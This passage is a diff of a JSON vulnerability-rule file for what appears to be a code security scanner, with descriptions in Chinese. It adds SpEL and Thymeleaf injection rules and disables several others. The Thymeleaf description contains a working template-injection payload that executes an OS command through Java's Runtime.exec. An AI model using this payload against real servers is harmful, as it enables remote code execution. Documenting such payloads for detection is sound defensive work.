"Visa\u5361\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684Visa\u4fe1\u7528\u5361\u6216\u501f\u8bb0\u5361\u53f7\u7801\u4ee5\u53ca\u76f8\u5173\u654f\u611f\u652f\u4ed8\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u5bfc\u81f4\u4e2a\u4eba\u91d1\u878d\u9690\u79c1\u53d7\u5230\u5a01\u80c1\u7684\u4e00\u79cd\u4e25\u91cd\u6f0f\u6d1e\u3002\n\u4e00\u65e6Visa\u5361\u4fe1\u606f\u88ab\u6cc4\u9732\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u5229\u7528\u8fd9\u4e9b\u4fe1\u606f\u8fdb\u884c\u5404\u79cd\u6076\u610f\u6d3b\u52a8\uff0c\u5305\u62ec\u975e\u6cd5\u8d2d\u7269\u3001\u91d1\u878d\u8bc8\u9a97\u3001\u8eab\u4efd\u76d7\u7a83\u4ee5\u53ca\u975e\u6cd5\u8f6c\u8d26\u3002\u4f8b\u5982\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u88ab\u6cc4\u9732\u7684\u5361\u53f7\u8fdb\u884c\u5728\u7ebf\u8d2d\u7269\u6216\u5b9e\u9645\u8d2d\u4e70\u5546\u54c1\u548c\u670d\u52a1\uff0c\u4ece\u800c\u5bfc\u81f4\u5361\u4e3b\u8d26\u6237\u8d44\u91d1\u88ab\u76d7\u6216\u8005\u6b20\u6b3e\u589e\u52a0\u3002\u6b64\u5916\uff0cVisa\u5361\u4fe1\u606f\u7684\u6cc4\u9732\u8fd8\u53ef\u80fd\u5bfc\u81f4\u4fe1\u7528\u8bc4\u5206\u4e0b\u964d\uff0c\u5bf9\u5361\u4e3b\u7684\u4fe1\u7528\u8bb0\u5f55\u4ea7\u751f\u8d1f\u9762\u5f71\u54cd\u3002\n\u4e3a\u4e86\u4fdd\u62a4Visa\u5361\u4fe1\u606f\u7684\u5b89\u5168\uff0c\u5361\u4e3b\u5e94\u5f53\u91c7\u53d6\u4e00\u7cfb\u5217\u9884\u9632\u63aa\u65bd\uff0c\u5305\u62ec\u5b9a\u671f\u68c0\u67e5\u8d26\u5355\uff0c\u8bbe\u7f6e\u5f3a\u5bc6\u7801\u548cPIN\u7801\uff0c\u4e0d\u968f\u610f\u5206\u4eab\u5361\u53f7\u7b49\u654f\u611f\u4fe1\u606f\uff0c\u4ee5\u53ca\u5728\u4f7f\u7528\u5361\u65f6\u4fdd\u6301\u8b66\u60d5\u3002\u540c\u65f6\uff0c\u91d1\u878d\u673a\u6784\u548c\u652f\u4ed8\u670d\u52a1\u63d0\u4f9b\u5546\u4e5f\u5e94\u52a0\u5f3a\u5b89\u5168\u63aa\u65bd\uff0c\u76d1\u6d4b\u4e0d\u6b63\u5e38\u7684\u4ea4\u6613\u6d3b\u52a8\uff0c\u4ee5\u53ca\u63d0\u4f9b\u5361\u4e3b\u4fdd\u62a4\u5176\u8d26\u6237\u514d\u53d7\u4e0d\u5f53\u4f7f\u7528\u7684\u624b\u6bb5\u3002\n\u5bf9\u4e8eVisa\u5361\u4fe1\u606f\u7684\u4e0d\u5f53\u6cc4\u9732\uff0c\u76f8\u5173\u6cd5\u5f8b\u6cd5\u89c4\u5e94\u8be5\u52a0\u4ee5\u7ea6\u675f\u548c\u60e9\u7f5a\uff0c\u4ee5\u7ef4\u62a4\u91d1\u878d\u9690\u79c1\u548c\u91d1\u878d\u7cfb\u7edf\u7684\u5b89\u5168\u6027\u3002\u8fd9\u6837\u53ef\u4ee5\u5e2e\u52a9\u51cf\u5c11Visa\u5361\u4fe1\u606f\u6cc4\u9732\u5bf9\u4e2a\u4eba\u548c\u793e\u4f1a\u7684\u6f5c\u5728\u98ce\u9669\u3002", - "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_desc_zh": "Spring Expression Language\uff08\u7b80\u79f0SpEL\uff09\u662f\u4e00\u79cd\u5f3a\u5927\u7684\u8868\u8fbe\u5f0f\u8bed\u8a00\uff0c\u652f\u6301\u5728\u8fd0\u884c\u65f6\u67e5\u8be2\u548c\u64cd\u4f5c\u5bf9\u8c61\u56fe\u3002\u8bed\u8a00\u8bed\u6cd5\u7c7b\u4f3c\u4e8eUnified EL\uff0c\u4f46\u63d0\u4f9b\u4e86\u989d\u5916\u7684\u529f\u80fd\uff0c\u7279\u522b\u662f\u65b9\u6cd5\u8c03\u7528\u548c\u57fa\u672c\u7684\u5b57\u7b26\u4e32\u6a21\u677f\u529f\u80fd\u3002\u540c\u65f6\u56e0\u4e3aSpEL\u662f\u4ee5API\u63a5\u53e3\u7684\u5f62\u5f0f\u521b\u5efa\u7684\uff0c\u6240\u4ee5\u5141\u8bb8\u5c06\u5176\u96c6\u6210\u5230\u5176\u4ed6\u5e94\u7528\u7a0b\u5e8f\u548c\u6846\u67b6\u4e2d\u3002\n", + "vul_fix": "1", "vul_fix_en": null, - "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_name": "VISA\u5361\u6cc4\u9732", + "vul_fix_zh": "1", + "vul_name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", "vul_name_en": null, - "vul_name_zh": "VISA\u5361\u6cc4\u9732", - "vul_type": "VISA\u5361\u6cc4\u9732" + "vul_name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "vul_type": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, + { + "level": 1, + "state": "enable", + "system_type": 0, + "user": 1, + "vul_desc": "Thymeleaf \u662f\u4e0e java \u914d\u5408\u4f7f\u7528\u7684\u4e00\u6b3e\u670d\u52a1\u7aef\u6a21\u677f\u5f15\u64ce\uff0c\u4e5f\u662f spring \u5b98\u65b9\u652f\u6301\u7684\u4e00\u6b3e\u670d\u52a1\u7aef\u6a21\u677f\u5f15\u64ce\u3002\u4ed6\u652f\u6301 HTML \u539f\u578b\uff0c\u5728 HTML \u6807\u7b7e\u4e2d\u589e\u52a0\u989d\u5916\u7684\u5c5e\u6027\u6765\u8fbe\u5230\u6a21\u677f + \u6570\u636e\u7684\u5c55\u793a\u65b9\u5f0f\u3002\u9ed8\u8ba4\u524d\u7f00\uff1a/templates/ \uff0c\u9ed8\u8ba4\u540e\u7f00\uff1a.html \n- Thymeleaf\u4f7f\u7528html\u901a\u8fc7\u4e00\u4e9b\u7279\u5b9a\u6807\u7b7e\u8bed\u6cd5\u4ee3\u8868\u5176\u542b\u4e49\uff0c\u4f46\u5e76\u672a\u7834\u574fhtml\u7ed3\u6784\uff0c\u5373\u4f7f\u65e0\u7f51\u7edc\u3001\u4e0d\u901a\u8fc7\u540e\u7aef\u6e32\u67d3\u4e5f\u80fd\u5728\u6d4f\u89c8\u5668\u6210\u529f\u6253\u5f00\uff0c\u5927\u5927\u65b9\u4fbf\u754c\u9762\u7684\u6d4b\u8bd5\u548c\u4fee\u6539\u3002\n- Thymeleaf\u63d0\u4f9b\u6807\u51c6\u548cSpring\u6807\u51c6\u4e24\u79cd\u65b9\u8a00\uff0c\u53ef\u4ee5\u76f4\u63a5\u5957\u7528\u6a21\u677f\u5b9e\u73b0JSTL\u3001 OGNL\u8868\u8fbe\u5f0f\u6548\u679c\uff0c\u907f\u514d\u6bcf\u5929\u5957\u6a21\u677f\u3001\u6539JSTL\u3001\u6539\u6807\u7b7e\u7684\u56f0\u6270\u3002\u540c\u65f6\u5f00\u53d1\u4eba\u5458\u4e5f\u53ef\u4ee5\u6269\u5c55\u548c\u521b\u5efa\u81ea\u5b9a\u4e49\u7684\u65b9\u8a00\u3002\n- Springboot\u5b98\u65b9\u5927\u529b\u63a8\u8350\u548c\u652f\u6301\uff0cSpringboot\u5b98\u65b9\u505a\u4e86\u5f88\u591a\u9ed8\u8ba4\u914d\u7f6e\uff0c\u5f00\u53d1\u8005\u53ea\u9700\u7f16\u5199\u5bf9\u5e94html\u5373\u53ef\uff0c\u5927\u5927\u51cf\u8f7b\u4e86\u4e0a\u624b\u96be\u5ea6\u548c\u914d\u7f6e\u590d\u6742\u5ea6\u3002\n\nThymeleaf\u652f\u6301\u8868\u8fbe\u5f0f\u8bed\u6cd5\uff0c\u5982\u679c\u6a21\u7248\u53c2\u6570\u5916\u90e8\u8def\u7531\u4f20\u5165\uff0c\u7528\u6237\u53ef\u63a7\uff0c\u53ef\u80fd\u4f1a\u5bfc\u81f4\u6076\u610f\u653b\u51fb\u8005\u83b7\u53d6\u670d\u52a1\u5668\u7cfb\u7edf\u6743\u9650\u7b49\u3002\nThymeleaf \u63d0\u4f9b\u4e86\u00a0[\u9884\u5904\u7406](https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#preprocessing)\u00a0\u8868\u8fbe\u5f0f\u7684\u529f\u80fd\uff0c\u9884\u5904\u7406\u8868\u8fbe\u5f0f\u4e0e\u666e\u901a\u8868\u8fbe\u5f0f\u5b8c\u5168\u4e00\u6837\uff0c\u4f46\u7531\u53cc\u4e0b\u5212\u7ebf\u7b26\u53f7\u5305\u56f4\uff0c\u5982`__${expression}__`\u00a0\uff0c\u88ab\u9884\u5904\u7406\u7684\u8868\u8fbe\u5f0f\u5c06\u4f1a\u88ab\u63d0\u524d\u6267\u884c\uff0c\u5e76\u4e14\u53ef\u4ee5\u8fd4\u56de\u5f53\u4f5c\u5916\u5c42\u5305\u88f9\u7684\u540e\u7eed\u8868\u8fbe\u5f0f\u7684\u4e00\u90e8\u5206\uff0c\u4f8b\u5982\uff1a`#{selection.__${sel.code}__}`\uff0cThymeleaf \u9996\u5148\u8fdb\u884c\u9884\u5904\u7406`${sel.code}`\u3002\u7136\u540e\uff0c\u5b83\u4f7f\u7528\u7ed3\u679c\uff08\u5728\u672c\u4f8b\u4e2d\u4e3a\u5b58\u50a8\u503c\u00a0_ALL_\u00a0\uff09\u4f5c\u4e3a\u7a0d\u540e\u8ba1\u7b97\u7684\u5b9e\u6570\u8868\u8fbe\u5f0f (\u00a0`#{selection.ALL}`) \u7684\u4e00\u90e8\u5206\u3002\nPayload\u5982\u4e0b\n\u901a\u8fc7${}::.x\u6784\u9020\u8868\u8fbe\u5f0f\u4f1a\u7531Thymeleaf\u53bb\u6267\u884c\n```java\n__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x\n```\n", + "vul_desc_en": null, + "vul_desc_zh": "Thymeleaf \u662f\u4e0e java \u914d\u5408\u4f7f\u7528\u7684\u4e00\u6b3e\u670d\u52a1\u7aef\u6a21\u677f\u5f15\u64ce\uff0c\u4e5f\u662f spring \u5b98\u65b9\u652f\u6301\u7684\u4e00\u6b3e\u670d\u52a1\u7aef\u6a21\u677f\u5f15\u64ce\u3002\u4ed6\u652f\u6301 HTML \u539f\u578b\uff0c\u5728 HTML \u6807\u7b7e\u4e2d\u589e\u52a0\u989d\u5916\u7684\u5c5e\u6027\u6765\u8fbe\u5230\u6a21\u677f + \u6570\u636e\u7684\u5c55\u793a\u65b9\u5f0f\u3002\u9ed8\u8ba4\u524d\u7f00\uff1a/templates/ \uff0c\u9ed8\u8ba4\u540e\u7f00\uff1a.html \n- Thymeleaf\u4f7f\u7528html\u901a\u8fc7\u4e00\u4e9b\u7279\u5b9a\u6807\u7b7e\u8bed\u6cd5\u4ee3\u8868\u5176\u542b\u4e49\uff0c\u4f46\u5e76\u672a\u7834\u574fhtml\u7ed3\u6784\uff0c\u5373\u4f7f\u65e0\u7f51\u7edc\u3001\u4e0d\u901a\u8fc7\u540e\u7aef\u6e32\u67d3\u4e5f\u80fd\u5728\u6d4f\u89c8\u5668\u6210\u529f\u6253\u5f00\uff0c\u5927\u5927\u65b9\u4fbf\u754c\u9762\u7684\u6d4b\u8bd5\u548c\u4fee\u6539\u3002\n- Thymeleaf\u63d0\u4f9b\u6807\u51c6\u548cSpring\u6807\u51c6\u4e24\u79cd\u65b9\u8a00\uff0c\u53ef\u4ee5\u76f4\u63a5\u5957\u7528\u6a21\u677f\u5b9e\u73b0JSTL\u3001 OGNL\u8868\u8fbe\u5f0f\u6548\u679c\uff0c\u907f\u514d\u6bcf\u5929\u5957\u6a21\u677f\u3001\u6539JSTL\u3001\u6539\u6807\u7b7e\u7684\u56f0\u6270\u3002\u540c\u65f6\u5f00\u53d1\u4eba\u5458\u4e5f\u53ef\u4ee5\u6269\u5c55\u548c\u521b\u5efa\u81ea\u5b9a\u4e49\u7684\u65b9\u8a00\u3002\n- Springboot\u5b98\u65b9\u5927\u529b\u63a8\u8350\u548c\u652f\u6301\uff0cSpringboot\u5b98\u65b9\u505a\u4e86\u5f88\u591a\u9ed8\u8ba4\u914d\u7f6e\uff0c\u5f00\u53d1\u8005\u53ea\u9700\u7f16\u5199\u5bf9\u5e94html\u5373\u53ef\uff0c\u5927\u5927\u51cf\u8f7b\u4e86\u4e0a\u624b\u96be\u5ea6\u548c\u914d\u7f6e\u590d\u6742\u5ea6\u3002\n\nThymeleaf\u652f\u6301\u8868\u8fbe\u5f0f\u8bed\u6cd5\uff0c\u5982\u679c\u6a21\u7248\u53c2\u6570\u5916\u90e8\u8def\u7531\u4f20\u5165\uff0c\u7528\u6237\u53ef\u63a7\uff0c\u53ef\u80fd\u4f1a\u5bfc\u81f4\u6076\u610f\u653b\u51fb\u8005\u83b7\u53d6\u670d\u52a1\u5668\u7cfb\u7edf\u6743\u9650\u7b49\u3002\nThymeleaf \u63d0\u4f9b\u4e86\u00a0[\u9884\u5904\u7406](https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#preprocessing)\u00a0\u8868\u8fbe\u5f0f\u7684\u529f\u80fd\uff0c\u9884\u5904\u7406\u8868\u8fbe\u5f0f\u4e0e\u666e\u901a\u8868\u8fbe\u5f0f\u5b8c\u5168\u4e00\u6837\uff0c\u4f46\u7531\u53cc\u4e0b\u5212\u7ebf\u7b26\u53f7\u5305\u56f4\uff0c\u5982`__${expression}__`\u00a0\uff0c\u88ab\u9884\u5904\u7406\u7684\u8868\u8fbe\u5f0f\u5c06\u4f1a\u88ab\u63d0\u524d\u6267\u884c\uff0c\u5e76\u4e14\u53ef\u4ee5\u8fd4\u56de\u5f53\u4f5c\u5916\u5c42\u5305\u88f9\u7684\u540e\u7eed\u8868\u8fbe\u5f0f\u7684\u4e00\u90e8\u5206\uff0c\u4f8b\u5982\uff1a`#{selection.__${sel.code}__}`\uff0cThymeleaf \u9996\u5148\u8fdb\u884c\u9884\u5904\u7406`${sel.code}`\u3002\u7136\u540e\uff0c\u5b83\u4f7f\u7528\u7ed3\u679c\uff08\u5728\u672c\u4f8b\u4e2d\u4e3a\u5b58\u50a8\u503c\u00a0_ALL_\u00a0\uff09\u4f5c\u4e3a\u7a0d\u540e\u8ba1\u7b97\u7684\u5b9e\u6570\u8868\u8fbe\u5f0f (\u00a0`#{selection.ALL}`) \u7684\u4e00\u90e8\u5206\u3002\nPayload\u5982\u4e0b\n\u901a\u8fc7${}::.x\u6784\u9020\u8868\u8fbe\u5f0f\u4f1a\u7531Thymeleaf\u53bb\u6267\u884c\n```java\n__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x\n```\n", + "vul_fix": "", + "vul_fix_en": null, + "vul_fix_zh": "", + "vul_name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "vul_name_en": null, + "vul_name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "vul_type": "Thymeleaf\u6a21\u7248\u6ce8\u5165" }, { "level": 1, @@ -225,7 +209,7 @@ }, { "level": 3, - "state": "enable", + "state": "disable", "system_type": 1, "user": 1, "vul_desc": "\u6ca1\u6709\u8bbe\u7f6eHTTPS\u4f1a\u8bdd\u4e2d\u654f\u611fcookie\u7684\u5b89\u5168\u5c5e\u6027\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u7528\u6237\u4ee3\u7406\u901a\u8fc7HTTP\u4f1a\u8bdd\u4ee5\u660e\u6587\u53d1\u9001\u8fd9\u4e9bcookie\u3002", @@ -241,7 +225,7 @@ }, { "level": 3, - "state": "enable", + "state": "disable", "system_type": 1, "user": 1, "vul_desc": "\u6570\u636e\u901a\u8fc7\u5f31\u52a0\u5bc6\u7b97\u6cd5MessageDigest\u51fd\u6570\u8fdb\u884c\u52a0\u5bc6", @@ -257,7 +241,7 @@ }, { "level": 3, - "state": "enable", + "state": "disable", "system_type": 1, "user": 1, "vul_desc": "\u54c8\u5e0c\u7b97\u6cd5\u662f\u4f7f\u7528\u54c8\u5e0c\u51fd\u6570\u5c06\u4efb\u610f\u957f\u5ea6\u7684\u6d88\u606f\u6620\u5c04\u6210\u4e3a\u4e00\u4e2a\u957f\u5ea6\u8f83\u77ed\u4e14\u957f\u5ea6\u56fa\u5b9a\u7684\u503c\uff0c\u8fd9\u4e2a\u7ecf\u8fc7\u6620\u5c04\u7684\u503c\u4e3a\u54c8\u5e0c\u503c\u3002\u5b83\u662f\u4e00\u79cd\u5355\u5411\u52a0\u5bc6\u4f53\u5236\uff0c\u5373\u4e00\u4e2a\u4ece\u660e\u6587\u5230\u5bc6\u6587\u7684\u4e0d\u53ef\u9006\u6620\u5c04\uff0c\u53ea\u6709\u52a0\u5bc6\u8fc7\u7a0b\uff0c\u6ca1\u6709\u89e3\u5bc6\u8fc7\u7a0b\u3002\u800c\u4e0d\u5b89\u5168\u7684\u54c8\u5e0c\u7b97\u6cd5\u5219\u53ef\u4ee5\u9006\u5411\u63a8\u51fa\u660e\u6587\u3002\u5728\u5bc6\u7801\u5b66\u4e2d\uff0c\u54c8\u5e0c\u7b97\u6cd5\u4e3b\u8981\u7528\u4e8e\u6d88\u606f\u6458\u8981\u548c\u7b7e\u540d\u6765\u5bf9\u6574\u4e2a\u6d88\u606f\u7684\u5b8c\u6574\u6027\u8fdb\u884c\u6821\u9a8c\uff0c\u6240\u4ee5\u9700\u8981\u54c8\u5e0c\u7b97\u6cd5\u65e0\u6cd5\u63a8\u5bfc\u8f93\u5165\u7684\u539f\u59cb\u503c\uff0c\u8fd9\u662f\u54c8\u5e0c\u7b97\u6cd5\u5b89\u5168\u6027\u7684\u57fa\u7840\u3002\u76ee\u524d\u5e38\u7528\u7684\u54c8\u5e0c\u7b97\u6cd5\u5305\u62ecMD4\u3001MD5\u3001SHA\u7b49\u3002\u672c\u7bc7\u6587\u7ae0\u4ee5JAVA\u8bed\u8a00\u6e90\u4ee3\u7801\u4e3a\u4f8b\uff0c\u5206\u6790\u4e0d\u5b89\u5168\u7684\u54c8\u5e0c\u7b97\u6cd5\u7f3a\u9677\u4ea7\u751f\u7684\u539f\u56e0\u4ee5\u53ca\u4fee\u590d\u65b9\u6cd5\u3002\u8be6\u7ec6\u8bf7\u53c2\u89c1\uff1aCWE ID 327: Use of a Broken or Risky Cryptographic Algorithm (http://cwe.mitre.org/data/definitions/327.html)\u3002", @@ -273,7 +257,7 @@ }, { "level": 3, - "state": "enable", + "state": "disable", "system_type": 1, "user": 1, "vul_desc": "\u968f\u673a\u6570\u5728\u8ba1\u7b97\u673a\u5e94\u7528\u4e2d\u4f7f\u7528\u7684\u6bd4\u8f83\u5e7f\u6cdb\uff0c\u6700\u4e3a\u719f\u77e5\u7684\u4fbf\u662f\u5728\u5bc6\u7801\u5b66\u4e2d\u7684\u5e94\u7528\u3002\u968f\u673a\u6570\u5206\u4e3a\u771f\u968f\u673a\u6570\u548c\u4f2a\u968f\u673a\u6570\uff0c\u6211\u4eec\u7a0b\u5e8f\u4f7f\u7528\u7684\u57fa\u672c\u90fd\u662f\u4f2a\u968f\u673a\u6570\u3002\u4f2a\u968f\u673a\u53c8\u5206\u4e3a\u5f3a\u4f2a\u968f\u673a\u6570\u548c\u5f31\u4f2a\u968f\u673a\u6570\u3002\u4f2a\u968f\u673a\u6570\uff0c\u901a\u8fc7\u4e00\u5b9a\u7b97\u6cd5\u548c\u79cd\u5b50\u5f97\u51fa\u3002\u8f6f\u4ef6\u5b9e\u73b0\u7684\u662f\u4f2a\u968f\u673a\u6570\u3002\u5f3a\u4f2a\u968f\u673a\u6570\uff0c\u96be\u4ee5\u9884\u6d4b\u7684\u968f\u673a\u6570\u3002\u5f31\u4f2a\u968f\u673a\u6570\uff0c\u6613\u4e8e\u9884\u6d4b\u7684\u968f\u673a\u6570\u3002\nJava\u7a0b\u5e8f\u4e2d\uff0c\u4f7f\u7528java.util.Random\u83b7\u5f97\u968f\u673a\u6570\uff0c\u8fd9\u79cd\u968f\u673a\u6570\u6e90\u4e8e\u4f2a\u968f\u673a\u6570\u751f\u6210\u5668\uff0c\u4ea7\u751f\u7684\u968f\u673a\u6570\u5bb9\u6613\u88ab\u9884\u6d4b\uff0c\u5bf9\u4e8e\u5b89\u5168\u6027\u8981\u6c42\u8f83\u9ad8\u7684\u73af\u5883\u4e2d\uff0c\u4f7f\u7528\u8fd9\u79cd\u968f\u673a\u6570\u53ef\u80fd\u4f1a\u964d\u4f4e\u7cfb\u7edf\u5b89\u5168\u6027\uff0c\u4f7f\u653b\u51fb\u8005\u6709\u673a\u53ef\u4e58\u3002", @@ -417,7 +401,7 @@ }, { "level": 2, - "state": "enable", + "state": "disable", "system_type": 1, "user": 1, "vul_desc": "\u8de8\u7ad9\u811a\u672c\u653b\u51fb\u6f0f\u6d1e\u7b80\u79f0XSS\u6f0f\u6d1e,\u4e3b\u8981\u662f\u7531\u4e8e\u5e94\u7528\u540e\u7aef\u672a\u5bf9\u7528\u6237\u8f93\u5165\u8fdb\u884c\u5b89\u5168\u6821\u9a8c\u6216\u6821\u9a8c\u4e0d\u4e25\u683c\u5bfc\u81f4\u6076\u610f\u7528\u6237\u53ef\u81ea\u5b9a\u4e49\u63a7\u5236\u9875\u9762\u8f93\u51fa\u5185\u5bb9\uff0c\u4ece\u800c\u4ea7\u751f\u8de8\u7ad9\u811a\u672c\u653b\u51fb\u6f0f\u6d1e\u3002\u901a\u5e38\u6765\u8bf4\u6076\u610f\u7528\u6237\u901a\u8fc7\u6784\u9020\u95ed\u5408\u6807\u7b7e\u65b9\u5f0f\u5728HTML\u9875\u9762\u4e2d\u63d2\u5165Javascript\u4ee3\u7801\uff0c\u5728\u6b63\u5e38\u7528\u6237\u6d4f\u89c8\u6b64\u9875\u9762\u65f6\u5bf9\u6b63\u5e38\u7528\u6237\u8fdb\u884c\u653b\u51fb\uff0c\u5e38\u89c1\u7684\u653b\u51fb\u65b9\u5f0f\u6709\u83b7\u53d6\u7528\u6237\u7684\u8eab\u4efd\u51ed\u636e\u3001\u5bf9\u7528\u6237\u5185\u7f51\u8fdb\u884c\u63a2\u6d4b\u626b\u63cf\u3001\u6267\u884c\u9493\u9c7c\u6b3a\u9a97\u653b\u51fb\u7b49", @@ -495,25 +479,9 @@ "vul_name_zh": "\u670d\u52a1\u5668\u7aef\u8bf7\u6c42\u4f2a\u9020", "vul_type": "ssrf" }, - { - "level": 1, - "state": "disable", - "system_type": 0, - "user": 1, - "vul_desc": "test", - "vul_desc_en": null, - "vul_desc_zh": "test", - "vul_fix": "", - "vul_fix_en": null, - "vul_fix_zh": "", - "vul_name": "test", - "vul_name_en": null, - "vul_name_zh": "test", - "vul_type": "test" - }, { "level": 3, - "state": "enable", + "state": "disable", "system_type": 1, "user": 1, "vul_desc": "CWE-501\uff0c\u4fe1\u4efb\u8fb9\u754c\u53ef\u4ee5\u8ba4\u4e3a\u662f\u901a\u8fc7\u7a0b\u5e8f\u7ed8\u5236\u7684\u7ebf\u3002 \u5728\u751f\u4ea7\u7ebf\u7684\u4e00\u4fa7\uff0c\u6570\u636e\u4e0d\u53d7\u4fe1\u4efb\u3002 \u5728\u8be5\u884c\u7684\u53e6\u4e00\u7aef\uff0c\u5047\u5b9a\u6570\u636e\u662f\u53ef\u4fe1\u7684\u3002 \u9a8c\u8bc1\u903b\u8f91\u7684\u76ee\u7684\u662f\u5141\u8bb8\u6570\u636e\u5b89\u5168\u5730\u8d8a\u8fc7\u4fe1\u4efb\u8fb9\u754c-\u4ece\u4e0d\u53d7\u4fe1\u4efb\u53d8\u4e3a\u53d7\u4fe1\u4efb\u3002 \u5f53\u7a0b\u5e8f\u6a21\u7cca\u4e86\u53ef\u4fe1\u548c\u4e0d\u53ef\u4fe1\u4e4b\u95f4\u7684\u754c\u9650\u65f6\uff0c\u5c31\u4f1a\u53d1\u751f\u4fe1\u4efb\u8fb9\u754c\u51b2\u7a81\u3002 \u901a\u8fc7\u5728\u540c\u4e00\u6570\u636e\u7ed3\u6784\u4e2d\u7ec4\u5408\u53ef\u4fe1\u6570\u636e\u548c\u4e0d\u53ef\u4fe1\u6570\u636e\uff0c\u7a0b\u5e8f\u5458\u53ef\u4ee5\u66f4\u5bb9\u6613\u5730\u9519\u8bef\u5730\u4fe1\u4efb\u672a\u9a8c\u8bc1\u7684\u6570\u636e\u3002", @@ -655,38 +623,6 @@ "vul_name_zh": "\u624b\u673a\u53f7\u7801\u6cc4\u6f0f", "vul_type": "\u624b\u673a\u53f7\u7801\u6cc4\u6f0f" }, - { - "level": 1, - "state": "enable", - "system_type": 1, - "user": 1, - "vul_desc": "\u62a4\u7167\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u7684\u62a4\u7167\u53f7\u7801\u3001\u59d3\u540d\u3001\u51fa\u751f\u65e5\u671f\u7b49\u654f\u611f\u8eab\u4efd\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u6cc4\u9732\uff0c\u53ef\u80fd\u5bfc\u81f4\u8eab\u4efd\u76d7\u7a83\u3001\u975e\u6cd5\u5165\u5883\u3001\u91d1\u878d\u6b3a\u8bc8\u7b49\u4e25\u91cd\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u5bf9\u53d7\u5bb3\u8005\u7684\u91d1\u878d\u548c\u6cd5\u5f8b\u5b89\u5168\u9020\u6210\u4e25\u91cd\u5a01\u80c1\u3002", - "vul_desc_en": null, - "vul_desc_zh": "\u62a4\u7167\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u7684\u62a4\u7167\u53f7\u7801\u3001\u59d3\u540d\u3001\u51fa\u751f\u65e5\u671f\u7b49\u654f\u611f\u8eab\u4efd\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u6cc4\u9732\uff0c\u53ef\u80fd\u5bfc\u81f4\u8eab\u4efd\u76d7\u7a83\u3001\u975e\u6cd5\u5165\u5883\u3001\u91d1\u878d\u6b3a\u8bc8\u7b49\u4e25\u91cd\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u5bf9\u53d7\u5bb3\u8005\u7684\u91d1\u878d\u548c\u6cd5\u5f8b\u5b89\u5168\u9020\u6210\u4e25\u91cd\u5a01\u80c1\u3002", - "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_fix_en": null, - "vul_fix_zh": 